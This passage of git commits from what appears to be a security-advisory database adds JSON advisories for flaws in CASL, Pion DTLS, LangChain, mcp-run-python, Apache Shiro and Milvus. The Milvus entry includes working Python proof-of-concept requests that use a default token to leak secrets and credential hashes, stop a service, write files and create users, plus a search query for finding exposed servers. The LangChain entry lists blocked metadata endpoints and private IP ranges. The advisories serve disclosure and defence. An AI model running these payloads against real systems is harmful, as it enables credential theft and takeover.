+51,10 @@ { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402616" + }, + { + "type": "PACKAGE", + "url": "https://github.com/keycloak/keycloak" } ], "database_specific": { @@ -33,8 +62,8 @@ "CWE-117" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T19:08:55Z", "nvd_published_at": "2026-02-10T11:16:09Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-x9vf-53q3-cvx6/GHSA-x9vf-53q3-cvx6.json b/advisories/github-reviewed/2026/02/GHSA-x9vf-53q3-cvx6/GHSA-x9vf-53q3-cvx6.json new file mode 100644 index 0000000000000..488b4e37096fd --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-x9vf-53q3-cvx6/GHSA-x9vf-53q3-cvx6.json @@ -0,0 +1,84 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x9vf-53q3-cvx6", + "modified": "2026-02-11T19:09:05Z", + "published": "2026-02-10T18:30:38Z", + "aliases": [ + "CVE-2026-1774" + ], + "summary": "CASL Ability is Vulnerable to Prototype Pollution", + "details": "CASL Ability, versions 2.4.0 through 6.7.4, contains a prototype pollution vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@casl/ability" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "6.7.5" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.7.4" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1774" + }, + { + "type": "WEB", + "url": "https://github.com/stalniy/casl/pull/1093" + }, + { + "type": "WEB", + "url": "https://github.com/stalniy/casl/commit/39da920ec1dfadf3655e28bd0389e960ac6871f4" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/1321.html" + }, + { + "type": "WEB", + "url": "https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution" + }, + { + "type": "PACKAGE", + "url": "https://github.com/stalniy/casl" + }, + { + "type": "WEB", + "url": "https://github.com/stalniy/casl/tree/master/packages/casl-ability" + }, + { + "type": "WEB", + "url": "https://www.kb.cert.org/vuls/id/458422" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1321" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T19:09:05Z", + "nvd_published_at": "2026-02-10T16:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x9vf-53q3-cvx6/GHSA-x9vf-53q3-cvx6.json b/advisories/unreviewed/2026/02/GHSA-x9vf-53q3-cvx6/GHSA-x9vf-53q3-cvx6.json deleted file mode 100644 index 126484e31423b..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-x9vf-53q3-cvx6/GHSA-x9vf-53q3-cvx6.json +++ /dev/null @@ -1,41 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-x9vf-53q3-cvx6", - "modified": "2026-02-10T18:30:38Z", - "published": "2026-02-10T18:30:38Z", - "aliases": [ - "CVE-2026-1774" - ], - "details": "CASL Ability, versions 2.4.0 through 6.7.4, contains a prototype pollution vulnerability.", - "severity": [], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1774" - }, - { - "type": "WEB", - "url": "https://cwe.mitre.org/data/definitions/1321.html" - }, - { - "type": "WEB", - "url": "https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution" - }, - { - "type": "WEB", - "url": "https://github.com/stalniy/casl/tree/master/packages/casl-ability" - }, - { - "type": "WEB", - "url": "https://www.kb.cert.org/vuls/id/458422" - } - ], - "database_specific": { - "cwe_ids": [], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-10T16:16:10Z" - } -} \ No newline at end of file From 2eb098a15c6a2089742db492b1b71b587dbb7a7f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 19:31:41 +0000 Subject: [PATCH 015/215] Publish Advisories GHSA-9f3f-wv7r-qc8r GHSA-gf3v-fwqg-4vh7 --- .../2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json | 6 ++++-- .../2026/02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json | 6 ++++-- 2 files changed, 8 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json index b31d9b2fd3891..f0e3eea3bddff 100644 --- a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json +++ b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-9f3f-wv7r-qc8r", - "modified": "2026-02-11T15:13:12Z", + "modified": "2026-02-11T19:30:08Z", "published": "2026-02-11T15:13:12Z", - "aliases": [], + "aliases": [ + "CVE-2026-26014" + ], "summary": "Pion DTLS's usage of random nonce generation with AES GCM ciphers risks leaking the authentication key", "details": "### Impact\nPion DTLS versions v1.0.0 through v3.1.0 use random nonce generation with AES GCM ciphers, which makes it easier for remote attackers to obtain the authentication key and spoof data by leveraging the reuse of a nonce in a session and a \"forbidden attack\". \n\n### Patches\nUpgrade to v3.1.0 or later. This version includes PR #796, which uses the 64-bit sequence number to populate the `nonce_explicit` part of the GCM nonce. This is according to best practice outlined in [RFC 9325 section 7.2.1](https://www.rfc-editor.org/rfc/rfc9325#section-7.2.1).\n\n### Workarounds\nThere are no workarounds without upgrading to version v3.1.0 or later.\n\n### References\nCommit fixing the bug: https://github.com/pion/dtls/commit/61762dee8217991882c5eb79856b9e7a73ee349f\nPull request: #796", "severity": [ diff --git a/advisories/github-reviewed/2026/02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json b/advisories/github-reviewed/2026/02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json index 8937e7770da6b..fdeab43f52625 100644 --- a/advisories/github-reviewed/2026/02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json +++ b/advisories/github-reviewed/2026/02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-gf3v-fwqg-4vh7", - "modified": "2026-02-11T15:13:20Z", + "modified": "2026-02-11T19:30:27Z", "published": "2026-02-11T15:13:20Z", - "aliases": [], + "aliases": [ + "CVE-2026-26019" + ], "summary": "@langchain/community affected by SSRF Bypass in RecursiveUrlLoader via insufficient URL origin validation", "details": "## Description\n\nThe `RecursiveUrlLoader` class in `@langchain/community` is a web crawler that recursively follows links from a starting URL. Its `preventOutside` option (enabled by default) is intended to restrict crawling to the same site as the base URL.\n\nThe implementation used `String.startsWith()` to compare URLs, which does not perform semantic URL validation. An attacker who controls content on a crawled page could include links to domains that share a string prefix with the target (e.g., `https://example.com.attacker.com` passes a `startsWith` check against `https://example.com`), causing the crawler to follow links to attacker-controlled or internal infrastructure.\n\nAdditionally, the crawler performed no validation against private or reserved IP addresses. A crawled page could include links targeting cloud metadata services (`169.254.169.254`), localhost, or RFC 1918 addresses, and the crawler would fetch them without restriction.\n\n## Impact\n\nAn attacker who can influence the content of a page being crawled (e.g., by placing a link on a public-facing page, forum, or user-generated content) could cause the crawler to:\n\n- Fetch cloud instance metadata (AWS, GCP, Azure), potentially exposing IAM credentials and session tokens\n- Access internal services on private networks (`10.x`, `172.16.x`, `192.168.x`)\n- Connect to localhost services\n- Exfiltrate response data via attacker-controlled redirect chains\n\nThis is exploitable in any environment where `RecursiveUrlLoader` runs on infrastructure with access to cloud metadata or internal services — which includes most cloud-hosted deployments.\n\n## Resolution\n\nTwo changes were made:\n\n1. **Origin comparison replaced.** The `startsWith` check was replaced with a strict origin comparison using the URL API (`new URL(link).origin === new URL(baseUrl).origin`). This correctly validates scheme, hostname, and port as a unit, preventing subdomain-based bypasses.\n\n2. **SSRF validation added to all fetch operations.** A new URL validation module (`@langchain/core/utils/ssrf`) was introduced and applied before every outbound fetch in the crawler. This blocks requests to:\n - **Cloud metadata endpoints:** `169.254.169.254`, `169.254.170.2`, `100.100.100.200`, `metadata.google.internal`, and related hostnames\n - **Private IP ranges:** `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`, `127.0.0.0/8`, `169.254.0.0/16`\n - **IPv6 equivalents:** `::1`, `fc00::/7`, `fe80::/10`\n - **Non-HTTP/HTTPS schemes** (`file:`, `ftp:`, `javascript:`, etc.)\n\nCloud metadata endpoints are unconditionally blocked and cannot be overridden.\n\n## Workarounds\n\nUsers who cannot upgrade immediately should avoid using `RecursiveUrlLoader` on untrusted or user-influenced content, or should run the crawler in a network environment without access to cloud metadata or internal services.", "severity": [ From 56ddc2aeb8cca5e2b972c2b318fc31d924580cfc Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 19:50:06 +0000 Subject: [PATCH 016/215] Publish Advisories GHSA-6fgp-m6q4-j3q5 GHSA-c244-p6m5-vqj6 GHSA-6fgp-m6q4-j3q5 GHSA-c244-p6m5-vqj6 --- .../GHSA-6fgp-m6q4-j3q5.json | 61 ++++++++++++++++ .../GHSA-c244-p6m5-vqj6.json | 72 +++++++++++++++++++ .../GHSA-6fgp-m6q4-j3q5.json | 36 ---------- .../GHSA-c244-p6m5-vqj6.json | 35 --------- 4 files changed, 133 insertions(+), 71 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-6fgp-m6q4-j3q5/GHSA-6fgp-m6q4-j3q5.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-c244-p6m5-vqj6/GHSA-c244-p6m5-vqj6.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-6fgp-m6q4-j3q5/GHSA-6fgp-m6q4-j3q5.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-c244-p6m5-vqj6/GHSA-c244-p6m5-vqj6.json diff --git a/advisories/github-reviewed/2026/02/GHSA-6fgp-m6q4-j3q5/GHSA-6fgp-m6q4-j3q5.json b/advisories/github-reviewed/2026/02/GHSA-6fgp-m6q4-j3q5/GHSA-6fgp-m6q4-j3q5.json new file mode 100644 index 0000000000000..87e875463d5c0 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-6fgp-m6q4-j3q5/GHSA-6fgp-m6q4-j3q5.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fgp-m6q4-j3q5", + "modified": "2026-02-11T19:47:51Z", + "published": "2026-02-09T09:30:22Z", + "aliases": [ + "CVE-2026-25904" + ], + "summary": "MCP Run Python Deno Sandbox Misconfiguration Allows SSRF Attacks via Localhost Access", + "details": "### Impact\n**Server-Side Request Forgery (SSRF):**\nA security vulnerability exists in the `mcp-run-python` tool (specifically within the Pydantic-AI integration) due to an overly permissive Deno sandbox configuration.\n\nThe tool configures the Deno runtime—which is intended to isolate the execution of untrusted Python code—with network permissions that include access to the host's loopback interface (`localhost`). Consequently, malicious Python code executed through the tool can bypass network isolation and send HTTP requests to internal services running on the host machine. This allows attackers to interact with local APIs, databases, or cloud metadata services that should not be accessible from the sandbox.\n\n### Patches\n**No Patch Available:**\nThe `mcp-run-python` project is currently **archived** and maintainers have indicated it is unlikely to receive a fix.\n\n**Recommendation:**\nUsers are strongly advised to **immediately stop using** this package.\nIf functionality is required, users must migrate to an alternative execution environment that enforces strict network isolation (e.g., blocking all outbound traffic or explicitly denying access to `127.0.0.1`/`::1`).\n\n### Workarounds\nThere are no configuration-based workarounds provided by the package itself. Remediation requires modifying the source code to restrict the Deno permissions (specifically removing or narrowing the `--allow-net` flag) or moving the execution to a container with no network access.\n\n### Resources\n* [CVE-2026-25904](https://nvd.nist.gov/vuln/detail/CVE-2026-25904)\n* [JFrog Security Analysis: Deno SSRF](https://research.jfrog.com/vulnerabilities/mcp-run-python-deno-ssrf-jfsa-2026-001653029)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "mcp-run-python" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.0.22" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25904" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/mcp-run-python" + }, + { + "type": "WEB", + "url": "https://research.jfrog.com/vulnerabilities/mcp-run-python-deno-ssrf-jfsa-2026-001653029" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T19:47:51Z", + "nvd_published_at": "2026-02-09T09:16:33Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-c244-p6m5-vqj6/GHSA-c244-p6m5-vqj6.json b/advisories/github-reviewed/2026/02/GHSA-c244-p6m5-vqj6/GHSA-c244-p6m5-vqj6.json new file mode 100644 index 0000000000000..c4cfb5215022e --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-c244-p6m5-vqj6/GHSA-c244-p6m5-vqj6.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c244-p6m5-vqj6", + "modified": "2026-02-11T19:48:43Z", + "published": "2026-02-09T12:30:22Z", + "aliases": [ + "CVE-2026-23903" + ], + "summary": "Apache Shiro has an Authentication Bypass", + "details": "### Impact\n\n**Authentication Bypass:**\nA vulnerability exists in Apache Shiro that allows authentication bypass for static files when served from a case-insensitive filesystem (such as the default configuration on macOS or Windows).\n\nThe issue arises when Shiro's URL filters are configured with lower-case rules (a common default), but the underlying operating system treats mixed-case filenames as identical. An attacker can access protected static resources by varying the capitalization of the filename in the request (e.g., requesting `/SECRET.TXT` to bypass a rule for `/secret.txt`).\n\nThis issue specifically affects static file handling and does not impact dynamic resource paths that are case-sensitive.\n\n### Patches\nUsers should upgrade to Apache Shiro **2.1.0** or later.\n\n**Important Configuration Note:**\nVersion 2.1.0 introduces a new configuration parameter to handle case-insensitivity, which must be enabled manually to resolve the issue:\n\n* **shiro.ini:**\n ```ini\n filterChainResolver.caseInsensitive = true\n ```\n* **Spring Boot (application.properties):**\n ```properties\n shiro.caseInsensitive=true\n ```\n\n*Note: Apache Shiro 3.0.0 (upcoming) will enable this setting by default.*\n\n### Workarounds\n* Ensure that the filesystem hosting the application is case-sensitive (e.g., Linux/Unix).\n* Manually configure all Shiro filter chains to handle all possible case variations of protected filenames (not recommended due to complexity).\n\n### Resources\n* [CVE-2026-23903](https://nvd.nist.gov/vuln/detail/CVE-2026-23903)\n* [Mailing List Announcement](https://lists.apache.org/thread/5jjf0hnjcol58z2m5y255c7scz1lnp8k)\n* [OSS-Security List](http://www.openwall.com/lists/oss-security/2026/02/08/1)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.shiro:shiro-spring" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.0.6" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23903" + }, + { + "type": "WEB", + "url": "https://github.com/apache/shiro/commit/3b9638b957495004599aeaf24ba8949e309f26e8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/shiro" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/5jjf0hnjcol58z2m5y255c7scz1lnp8k" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/08/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-289" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T19:48:43Z", + "nvd_published_at": "2026-02-09T10:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6fgp-m6q4-j3q5/GHSA-6fgp-m6q4-j3q5.json b/advisories/unreviewed/2026/02/GHSA-6fgp-m6q4-j3q5/GHSA-6fgp-m6q4-j3q5.json deleted file mode 100644 index a912f6d68e824..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-6fgp-m6q4-j3q5/GHSA-6fgp-m6q4-j3q5.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6fgp-m6q4-j3q5", - "modified": "2026-02-09T09:30:22Z", - "published": "2026-02-09T09:30:22Z", - "aliases": [ - "CVE-2026-25904" - ], - "details": "The Pydantic-AI MCP Run Python tool configures the Deno sandbox with an overly permissive configuration that allows the underlying Python code to access the localhost interface of the host to perform SSRF attacks. Note - the \"mcp-run-python\" project is archived and unlikely to receive a fix.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25904" - }, - { - "type": "WEB", - "url": "https://research.jfrog.com/vulnerabilities/mcp-run-python-deno-ssrf-jfsa-2026-001653029" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-918" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-09T09:16:33Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c244-p6m5-vqj6/GHSA-c244-p6m5-vqj6.json b/advisories/unreviewed/2026/02/GHSA-c244-p6m5-vqj6/GHSA-c244-p6m5-vqj6.json deleted file mode 100644 index 030bad5624f4b..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-c244-p6m5-vqj6/GHSA-c244-p6m5-vqj6.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-c244-p6m5-vqj6", - "modified": "2026-02-09T12:30:22Z", - "published": "2026-02-09T12:30:22Z", - "aliases": [ - "CVE-2026-23903" - ], - "details": "Authentication Bypass by Alternate Name vulnerability in Apache Shiro.\n\nThis issue affects Apache Shiro: before 2.0.7.\n\nUsers are recommended to upgrade to version 2.0.7, which fixes the issue.\n\nThe issue only effects static files. If static files are served from a case-insensitive filesystem,\nsuch as default macOS setup, static files may be accessed by varying the case of the filename in the request.\nIf only lower-case (common default) filters are present in Shiro, they may be bypassed this way.\n\nShiro 2.0.7 and later has a new parameters to remediate this issue\nshiro.ini: filterChainResolver.caseInsensitive = true\napplication.propertie: shiro.caseInsensitive=true\n\nShiro 3.0.0 and later (upcoming) makes this the default.", - "severity": [], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23903" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread/5jjf0hnjcol58z2m5y255c7scz1lnp8k" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2026/02/08/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-289" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-09T10:15:57Z" - } -} \ No newline at end of file From be30634bb0eaa4fdd8859ab1803ad1e7b7a53ebd Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 19:53:39 +0000 Subject: [PATCH 017/215] Publish GHSA-7ppg-37fh-vcr6 --- .../GHSA-7ppg-37fh-vcr6.json | 84 +++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json diff --git a/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json b/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json new file mode 100644 index 0000000000000..a071acda2440b --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json @@ -0,0 +1,84 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7ppg-37fh-vcr6", + "modified": "2026-02-11T19:49:44Z", + "published": "2026-02-11T19:49:44Z", + "aliases": [], + "summary": "Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise", + "details": "## Summary\n\nMilvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:\n\n1. The `/expr` debug endpoint uses a weak, predictable default authentication token derived from `etcd.rootPath` (default: `by-dev`), enabling arbitrary expression evaluation.\n2. The full REST API (`/api/v1/*`) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.\n\n## Details\n\n### Vulnerability 1: Weak Default Authentication on `/expr` Endpoint\n\nThe `/expr` endpoint on port 9091 accepts an `auth` parameter that defaults to the `etcd.rootPath` value (`by-dev`). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:\n\n- **Information/Credential Disclosure**: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via `param.MinioCfg.SecretAccessKey.GetValue()`, `rootcoord.meta.GetCredential(ctx, 'root')`, etc.\n- **Denial of Service**: Invoking `proxy.Stop()` to shut down the proxy service.\n- **Arbitrary File Write (potential RCE)**: Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.\n\n### Vulnerability 2: Unauthenticated REST API on Metrics Port\n\nBusiness-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via `registerHTTPServer()` in [`internal/distributed/proxy/service.go` (line 170)](https://github.com/milvus-io/milvus/blob/9996e8d1cebff7e7108bcb16d43124236de77438/internal/distributed/proxy/service.go#L170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.\n\nAn attacker can perform any business operation without credentials, including:\n\n- Creating, listing, and deleting collections\n- Inserting and querying data\n- Creating, listing, and deleting user credentials\n- Modifying user passwords\n\n## Proof of Concept\n\n### PoC 1 — `/expr` Endpoint Exploitation\n\n```python\nimport requests\n\nurl = \"http://:9091/expr\"\n\n# Leak sensitive configuration (e.g., MinIO secret key)\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"param.MinioCfg.SecretAccessKey.GetValue()\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Retrieve hashed credentials for the root user\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"rootcoord.meta.GetCredential(ctx, 'root')\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Denial of Service — stop the proxy\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"proxy.Stop()\"\n}, timeout=5)\n\n# Arbitrary file write (potential RCE)\nfor cmd in [\n 'param.Save(\"proxy.accessLog.localPath\", \"/tmp\")',\n 'param.Save(\"proxy.accessLog.formatters.base.format\", \"whoami\")',\n 'param.Save(\"proxy.accessLog.filename\", \"evil.sh\")',\n 'querycoord.etcdCli.KV.Put(ctx, \"by-dev/config/proxy/accessLog/enable\", \"true\")'\n]:\n requests.get(url, params={\"auth\": \"by-dev\", \"code\": cmd}, timeout=5)\n```\n\n### PoC 2 — Unauthenticated REST API Access\n\n```python\nimport requests\n\ntarget_url = \"http://:9091\"\n\n# Create a user without any authentication\nres = requests.post(f\"{target_url}/api/v1/credential\", json={\n \"username\": \"attacker_user\",\n \"password\": \"MTIzNDU2Nzg5\",\n})\nprint(res.json())\n\n# List all users\nres = requests.get(f\"{target_url}/api/v1/credential/users\")\nprint(res.json()) # {'status': {}, 'usernames': ['root', 'attacker_user']}\n\n# Create and delete collections, insert data — all without authentication\n```\n\n## Internet Exposure\n\nA significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:\n\n```\nhttp.body=\"404 page not found\" && port=\"9091\"\n```\n\nThis indicates the vulnerability is actively exploitable in real-world production environments.\n\n## Impact\n\nAn unauthenticated remote attacker with network access to port 9091 can:\n\n1. **Exfiltrate secrets and credentials** — MinIO keys, etcd credentials, user password hashes, and all internal configuration values.\n2. **Manipulate all data** — Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.\n3. **Manage user accounts** — Create administrative users, reset passwords, and escalate privileges.\n4. **Cause denial of service** — Shut down proxy services, drop databases, or corrupt metadata.\n5. **Write arbitrary files** — Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.\n\n## Remediation\n\n### Recommended Fixes\n\n1. **Remove or disable the `/expr` endpoint** in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.\n2. **Do not register business API routes on the metrics port.** Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.\n3. **Bind port 9091 to localhost by default** (`127.0.0.1:9091`) so it is not externally accessible unless explicitly configured.\n4. **Enforce authentication on all API endpoints**, regardless of which port they are served on.\n\n### User Mitigations (until patched)\n\n- Block external access to port 9091 using firewall rules or network policies.\n- If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.\n- Change the `etcd.rootPath` from the default value `by-dev` to a strong, random value (partial mitigation only — does not address the unauthenticated REST API).\n\n## Credit\n\nThis vulnerability was discovered and responsibly reported by **YingLin Xie** (xieyinglin@hust.edu.cn). It was independently reported by [0x1f](https://github.com/0x1f) and zznQ ([ac0d3r](https://github.com/ac0d3r)).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/milvus-io/milvus" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.5.27" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/milvus-io/milvus" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.6.0" + }, + { + "fixed": "2.6.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/milvus-io/milvus" + }, + { + "type": "WEB", + "url": "https://github.com/milvus-io/milvus/releases/tag/v2.5.27" + }, + { + "type": "WEB", + "url": "https://github.com/milvus-io/milvus/releases/tag/v2.6.10" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1188", + "CWE-306", + "CWE-749" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T19:49:44Z", + "nvd_published_at": null + } +} \ No newline at end of file From b8b97a155f9dff8c1a3d335007025f22799b62fe Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 21:32:56 +0000 Subject: [PATCH 018/215] Advisory Database Sync --- .../GHSA-82cg-rxq8-hc7m.json | 2 +- .../GHSA-238q-xh37-pmhj.json | 41 ++++++++++++++ .../GHSA-28wx-v484-3qch.json | 5 +- .../GHSA-2ffm-9xhq-mwc8.json | 48 ++++++++++++++++ .../GHSA-2g4f-4pwh-qvx6.json | 29 ++++++++++ .../GHSA-2prw-jcj2-h5xf.json | 33 +++++++++++ .../GHSA-32vw-wgfh-pxr5.json | 6 +- .../GHSA-349p-7f27-qvx8.json | 52 +++++++++++++++++ .../GHSA-34wv-c7h9-3524.json | 48 ++++++++++++++++ .../GHSA-35f2-992w-gmjg.json | 48 ++++++++++++++++ .../GHSA-35fp-m999-3h79.json | 3 +- .../GHSA-36h4-32cj-m84w.json | 6 +- .../GHSA-3745-9rxm-69m7.json | 48 ++++++++++++++++ .../GHSA-3757-h5gm-6pj5.json | 3 +- .../GHSA-37gh-h6xp-rvc2.json | 3 +- .../GHSA-3c9r-jvh7-2xjm.json | 3 +- .../GHSA-3fc2-jfpg-8jg5.json | 48 ++++++++++++++++ .../GHSA-3grf-qxvr-p8vp.json | 3 +- .../GHSA-3mf8-2573-7cx8.json | 40 +++++++++++++ .../GHSA-42ww-368q-gjw4.json | 48 ++++++++++++++++ .../GHSA-44j4-34hp-pwwr.json | 41 ++++++++++++++ .../GHSA-4r8r-m45w-c7cj.json | 3 +- .../GHSA-4r9x-qh7r-9qv9.json | 40 +++++++++++++ .../GHSA-4w34-9hcr-4jm4.json | 48 ++++++++++++++++ .../GHSA-5cch-r4ff-mh3m.json | 3 +- .../GHSA-5fv4-54xw-v6jx.json | 6 +- .../GHSA-5gpf-8prr-whq8.json | 3 +- 